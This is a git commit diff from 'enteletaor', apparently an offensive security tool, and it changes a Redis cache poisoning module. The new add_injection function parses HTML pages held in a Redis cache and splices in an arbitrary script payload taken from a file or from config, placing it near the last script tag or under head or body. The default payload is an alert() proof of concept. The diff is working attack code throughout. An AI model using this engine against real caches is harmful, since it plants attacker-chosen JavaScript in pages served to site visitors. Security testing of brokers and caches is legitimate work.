dash/enteletaor
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add: improved script injection engine for redis cache

Browse Source
This commit is contained in:
cr0hn
2016-02-26 13:04:23 +01:00
parent cd00730c0b
commit ad4e1ef1b0
1 changed files with 46 additions and 22 deletions
Download Patch File Download Diff File Expand all files Collapse all files

68
enteletaor_lib/modules/redis/redis_cache.py
View File

@@ -79,35 +79,27 @@ def handle_html(config, content):
results = None results = None
# --------------------------------------------------------------------------
# Search insertion points # Search insertion points
for point in ("head", "title", "body", "script", "div", "p"): # --------------------------------------------------------------------------
insert_point = doc_root.find(".//%s" % point)
if insert_point is None: # Try to find end of script entries
continue insert_point = doc_root.find(".//script[last()]")
# -------------------------------------------------------------------------- if insert_point is not None:
# Add the injection Payload results = add_injection(config, doc_root, insert_point, where="before")
# --------------------------------------------------------------------------
if config.poison_payload_file is not None:
with open(config.poison_payload_file, "rU") as f:
_f_payload = f.read()
payload = etree.fromstring(_f_payload)
elif config.poison_payload: else:
payload = etree.fromstring(config.poison_payload) # Try to find othe entry
else: for point in ("head", "title", "body", "div", "p"):
payload = etree.fromstring("<script>alert('You are vulnerable to broker injection')</script>") insert_point = doc_root.find(".//%s" % point)
insert_point.addnext(payload) if insert_point is None:
continue
# Set results results = add_injection(config, doc_root, insert_point)
tmp_results = etree.tostring(doc_root, method="html", pretty_print=True, encoding=doc_root.docinfo.encoding)
# Codding filters break
results = tmp_results.decode(errors="replace").replace("\\u000a", "\n")
break
# -------------------------------------------------------------------------- # --------------------------------------------------------------------------
# Build results # Build results
@@ -115,6 +107,38 @@ def handle_html(config, content):
return results return results
# ----------------------------------------------------------------------
def add_injection(config, doc_root, insert_point, where="after"):
"""
:param where: posible values: after|before
:type where: str
"""
# --------------------------------------------------------------------------
# Add the injection Payload
# --------------------------------------------------------------------------
if config.poison_payload_file is not None:
with open(config.poison_payload_file, "rU") as f:
_f_payload = f.read()
payload = etree.fromstring(_f_payload)
elif config.poison_payload:
payload = etree.fromstring(config.poison_payload)
else:
payload = etree.fromstring("<script>alert('You are vulnerable to broker injection')</script>")
insert_point.addnext(payload)
# Set results
tmp_results = etree.tostring(doc_root, method="html", pretty_print=True, encoding=doc_root.docinfo.encoding)
# Codding filters
results = tmp_results.decode(errors="replace").replace("\\u000a", "\n")
return results
# ---------------------------------------------------------------------- # ----------------------------------------------------------------------
def action_redis_cache_poison(config): def action_redis_cache_poison(config):
""" """